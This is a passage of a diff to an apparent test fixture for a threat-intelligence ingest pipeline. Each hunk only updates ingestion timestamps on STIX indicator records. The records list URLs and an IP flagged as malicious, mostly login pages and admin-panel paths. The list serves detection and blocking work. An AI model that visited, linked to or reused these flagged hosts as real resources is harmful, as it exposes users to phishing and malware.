89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:41.781Z\"}", "category": "threat", "type": "indicator", 
@@ -30881,7 +30881,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026603Z", + "ingested": "2021-12-14T14:57:43.118465281Z", "original": "{\"created\":\"2020-02-25T02:52:52.59Z\",\"description\":\"TS ID: 55347597566; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--4f92667a-5e1b-4111-88d4-e3e04405e97a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:52:52.59Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/10/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/10/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.59Z\"}", "category": "threat", "type": "indicator", @@ -30933,7 +30933,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026609600Z", + "ingested": "2021-12-14T14:57:43.118465805Z", "original": "{\"created\":\"2020-02-25T02:52:52.623Z\",\"description\":\"TS ID: 55347597530; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--04bc5b54-46ae-44d7-96a6-863481383436\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:52:52.623Z\",\"name\":\"mal_url: http://anypontop.com/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://anypontop.com/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.623Z\"}", "category": "threat", "type": "indicator", 
@@ -30978,7 +30978,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026616300Z", + "ingested": "2021-12-14T14:57:43.118466530Z", "original": "{\"created\":\"2020-02-25T02:52:52.674Z\",\"description\":\"TS ID: 55347597522; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--65a5607b-388a-4789-98d0-84d77ee94047\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-25T02:52:52.674Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.674Z\"}", "category": "threat", "type": "indicator", @@ -31030,7 +31030,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026645200Z", + "ingested": "2021-12-14T14:57:43.118466913Z", "original": "{\"created\":\"2020-02-25T02:52:52.712Z\",\"description\":\"TS ID: 55347597467; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--b70344da-8137-4550-b569-97f0e3020ab1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-25T02:52:52.712Z\",\"name\":\"mal_url: http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.712Z\"}", "category": "threat", "type": "indicator", 
@@ -31075,7 +31075,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026672Z", + "ingested": "2021-12-14T14:57:43.118467452Z", "original": "{\"created\":\"2020-02-25T02:52:55.912Z\",\"description\":\"TS ID: 55347597506; iType: mal_ip; State: active; Org: Leaseweb Deutschland GmbH; Source: CyberCrime\",\"id\":\"indicator--3ff92876-fac4-49a6-ae80-d123206dc224\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-25T02:52:55.912Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:55.912Z\"}", "category": "threat", "type": "indicator", @@ -31126,7 +31126,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026680300Z", + "ingested": "2021-12-14T14:57:43.118467921Z", "original": "{\"created\":\"2020-02-25T02:53:04.191Z\",\"description\":\"TS ID: 55347597485; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--cb9b2721-6623-44c2-b1e5-143f2291738b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-25T02:53:04.191Z\",\"name\":\"mal_url: http://belt-yard-74.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://belt-yard-74.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:04.191Z\"}", "category": "threat", "type": "indicator", 
@@ -31178,7 +31178,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026684500Z", + "ingested": "2021-12-14T14:57:43.118468441Z", "original": "{\"created\":\"2020-02-25T02:53:12.657Z\",\"description\":\"TS ID: 55347597478; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--04c56a59-3a16-4284-9edc-5445bb539ce5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:53:12.657Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:12.657Z\"}", "category": "threat", "type": "indicator", @@ -31230,7 +31230,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026687900Z", + "ingested": "2021-12-14T14:57:43.118468833Z", "original": "{\"created\":\"2020-02-25T02:53:15.804Z\",\"description\":\"TS ID: 55347597559; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--1989ffaf-19a7-4850-b142-d31758a3751f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:53:15.804Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/11/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/11/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:15.804Z\"}", "category": "threat", "type": "indicator", 
@@ -31275,7 +31275,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026692900Z", + "ingested": "2021-12-14T14:57:43.118469399Z", "original": "{\"created\":\"2020-02-25T02:53:15.88Z\",\"description\":\"TS ID: 55347597483; iType: mal_ip; State: active; Org: Datalot; Source: CyberCrime\",\"id\":\"indicator--66939f56-1a6f-43d1-b7a4-277e3ac55584\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-25T02:53:15.88Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:15.88Z\"}", "category": "threat", "type": "indicator", @@ -31327,7 +31327,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026698Z", + "ingested": "2021-12-14T14:57:43.118469842Z", "original": "{\"created\":\"2020-02-25T02:53:17.191Z\",\"description\":\"TS ID: 55347597555; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--fe0a731e-e2ff-49ac-a597-150ce46a31fc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:53:17.191Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/12/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/12/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.191Z\"}", "category": "threat", "type": "indicator", 
@@ -31379,7 +31379,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026704400Z", + "ingested": "2021-12-14T14:57:43.118470296Z", "original": "{\"created\":\"2020-02-25T02:53:17.224Z\",\"description\":\"TS ID: 55347597468; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--53d00201-4c9a-4275-9091-4cf08fda4676\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:53:17.224Z\",\"name\":\"mal_url: http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.224Z\"}", "category": "threat", "type": "indicator", @@ -31431,7 +31431,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026711300Z", + "ingested": "2021-12-14T14:57:43.118470712Z", "original": "{\"created\":\"2020-02-25T02:53:17.256Z\",\"description\":\"TS ID: 55347597466; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--4e154929-35ec-4f71-8793-6b861a9a98f1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-25T02:53:17.256Z\",\"name\":\"mal_url: http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.256Z\"}", "category": "threat", "type": "indicator", 
@@ -31483,7 +31483,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026718200Z", + "ingested": "2021-12-14T14:57:43.118471196Z", "original": "{\"created\":\"2020-02-25T02:53:17.916Z\",\"description\":\"TS ID: 55347597583; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--4ce097b7-254b-41cf-8c7d-934524548fd6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:53:17.916Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/8/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/8/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.916Z\"}", "category": "threat", "type": "indicator", @@ -31535,7 +31535,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026725Z", + "ingested": "2021-12-14T14:57:43.118471593Z", "original": "{\"created\":\"2020-02-25T02:53:17.952Z\",\"description\":\"TS ID: 55347597508; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--51f063d7-600f-43c3-9f88-92e4b3b603da\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:53:17.952Z\",\"name\":\"mal_url: http://petrouretro.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://petrouretro.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.952Z\"}", "category": "threat", "type": "indicator", 
@@ -31587,7 +31587,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026731800Z", + "ingested": "2021-12-14T14:57:43.118471983Z", "original": "{\"created\":\"2020-02-25T02:53:17.983Z\",\"description\":\"TS ID: 55347597481; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--5c9b2227-96df-4cc8-ba6b-c23f4da9667a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-25T02:53:17.983Z\",\"name\":\"mal_url: http://imperiaskygarden.net/.choo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://imperiaskygarden.net/.choo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.983Z\"}", "category": "threat", "type": "indicator", @@ -31639,7 +31639,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026738600Z", + "ingested": "2021-12-14T14:57:43.118472484Z", "original": "{\"created\":\"2020-02-25T02:53:36.323Z\",\"description\":\"TS ID: 55347597534; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--751b74f4-ded7-426d-b425-cb9c2b3113a8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:53:36.323Z\",\"name\":\"mal_url: http://agmardorecha.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://agmardorecha.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:36.323Z\"}", "category": "threat", "type": "indicator", 
@@ -31690,7 +31690,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026745400Z", + "ingested": "2021-12-14T14:57:43.118472937Z", "original": "{\"created\":\"2020-02-25T02:53:36.382Z\",\"description\":\"TS ID: 55347597492; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--4fcbf6f5-5acc-42da-acb0-497583b3388d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-25T02:53:36.382Z\",\"name\":\"mal_url: http://149.28.186.68/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://149.28.186.68/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:36.382Z\"}", "category": "threat", "type": "indicator", @@ -31742,7 +31742,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026752200Z", + "ingested": "2021-12-14T14:57:43.118473406Z", "original": "{\"created\":\"2020-02-25T02:53:36.421Z\",\"description\":\"TS ID: 55347597464; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--713e0d5f-3842-410f-98d8-25fe0f5b15db\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-25T02:53:36.421Z\",\"name\":\"mal_url: http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:36.421Z\"}", "category": "threat", "type": "indicator", 
@@ -31793,7 +31793,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026759100Z", + "ingested": "2021-12-14T14:57:43.118473833Z", "original": "{\"created\":\"2020-02-25T02:53:42.111Z\",\"description\":\"TS ID: 55347597500; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--895a994a-7833-47fe-a832-fc3ce5f070a5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-25T02:53:42.111Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:42.111Z\"}", "category": "threat", "type": "indicator", @@ -31845,7 +31845,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026765900Z", + "ingested": "2021-12-14T14:57:43.118474314Z", "original": "{\"created\":\"2020-02-25T02:54:16.295Z\",\"description\":\"TS ID: 55347597622; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--86fd616d-f6a3-45ff-a3a8-db1aa59defd9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:54:16.295Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/4/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/4/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:16.295Z\"}", "category": "threat", "type": "indicator", 
@@ -31897,7 +31897,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026772600Z", + "ingested": "2021-12-14T14:57:43.118474705Z", "original": "{\"created\":\"2020-02-25T02:54:21.544Z\",\"description\":\"TS ID: 55347597482; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--57fb3a6f-09ca-44a2-b309-724b570e1fd9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-25T02:54:21.544Z\",\"name\":\"mal_url: http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:21.544Z\"}", "category": "threat", "type": "indicator", @@ -31949,7 +31949,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026779400Z", + "ingested": "2021-12-14T14:57:43.118475137Z", "original": "{\"created\":\"2020-02-25T02:54:32.178Z\",\"description\":\"TS ID: 55347597608; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--1b2dfaef-5caa-4114-9634-cf2f9959dbfb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:54:32.178Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/5/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/5/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:32.178Z\"}", "category": "threat", "type": "indicator", 
@@ -32001,7 +32001,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026786100Z", + "ingested": "2021-12-14T14:57:43.118475606Z", "original": "{\"created\":\"2020-02-25T02:54:37.327Z\",\"description\":\"TS ID: 55347597484; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--44544bfd-7131-4530-a9de-96c1840101c1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:54:37.327Z\",\"name\":\"mal_url: http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:37.327Z\"}", "category": "threat", "type": "indicator", @@ -32052,7 +32052,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026789400Z", + "ingested": "2021-12-14T14:57:43.118476107Z", "original": "{\"created\":\"2020-02-25T02:54:37.383Z\",\"description\":\"TS ID: 55347597463; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--51779de2-0d07-4d60-abf6-afdc0dfc7637\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-25T02:54:37.383Z\",\"name\":\"mal_url: http://0ooo.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://0ooo.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:37.383Z\"}", "category": "threat", "type": "indicator", 
@@ -32104,7 +32104,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026794400Z", + "ingested": "2021-12-14T14:57:43.118476544Z", "original": "{\"created\":\"2020-02-25T02:54:48.929Z\",\"description\":\"TS ID: 55347597475; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--b7d14453-ad19-4246-961a-72f0e5136874\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:54:48.929Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:48.929Z\"}", "category": "threat", "type": "indicator", @@ -32149,7 +32149,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026815700Z", + "ingested": "2021-12-14T14:57:43.118477016Z", "original": "{\"created\":\"2020-02-25T02:54:54.632Z\",\"description\":\"TS ID: 55347597487; iType: mal_ip; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--064f2766-97b6-481d-a273-f80a97524be8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:54:54.632Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:54.632Z\"}", "category": "threat", "type": "indicator", 
@@ -32201,7 +32201,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026821700Z", + "ingested": "2021-12-14T14:57:43.118477599Z", "original": "{\"created\":\"2020-02-25T02:55:06.15Z\",\"description\":\"TS ID: 55347597650; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--3f3bca20-c218-431d-8250-0f600b011971\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:55:06.15Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/1/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/1/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:06.15Z\"}", "category": "threat", "type": "indicator", @@ -32253,7 +32253,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026825400Z", + "ingested": "2021-12-14T14:57:43.118478075Z", "original": "{\"created\":\"2020-02-25T02:55:06.186Z\",\"description\":\"TS ID: 55347597472; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--6b3d6689-75e8-4f50-a1c0-f1a1e6158493\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:55:06.186Z\",\"name\":\"mal_url: http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:06.186Z\"}", "category": "threat", "type": "indicator", 
@@ -32304,7 +32304,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026830500Z", + "ingested": "2021-12-14T14:57:43.118478453Z", "original": "{\"created\":\"2020-02-25T02:55:06.314Z\",\"description\":\"TS ID: 55347597495; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--1306883c-b911-4116-9121-492450e4bb07\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-25T02:55:06.314Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:06.314Z\"}", "category": "threat", "type": "indicator", @@ -32356,7 +32356,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026834500Z", + "ingested": "2021-12-14T14:57:43.118478848Z", "original": "{\"created\":\"2020-02-25T02:55:27.523Z\",\"description\":\"TS ID: 55347597627; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--d4a02ea1-435f-472e-8013-07e4e24f5a2e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:55:27.523Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/3/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/3/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:27.523Z\"}", "category": "threat", "type": "indicator", 
@@ -32408,7 +32408,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026838500Z", + "ingested": "2021-12-14T14:57:43.118479286Z", "original": "{\"created\":\"2020-02-25T02:55:35.424Z\",\"description\":\"TS ID: 55347597528; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--1e8d894d-1e8b-4ba9-ae25-1e3e00c055ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-25T02:55:35.424Z\",\"name\":\"mal_url: http://atomicwallet.email/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atomicwallet.email/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:35.424Z\"}", "category": "threat", "type": "indicator", @@ -32459,7 +32459,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026841800Z", + "ingested": "2021-12-14T14:57:43.118479686Z", "original": "{\"created\":\"2020-02-25T02:55:35.462Z\",\"description\":\"TS ID: 55347597489; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--cb377636-13ce-421e-926f-e33e2b954263\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:55:35.462Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:35.462Z\"}", "category": "threat", "type": "indicator", 
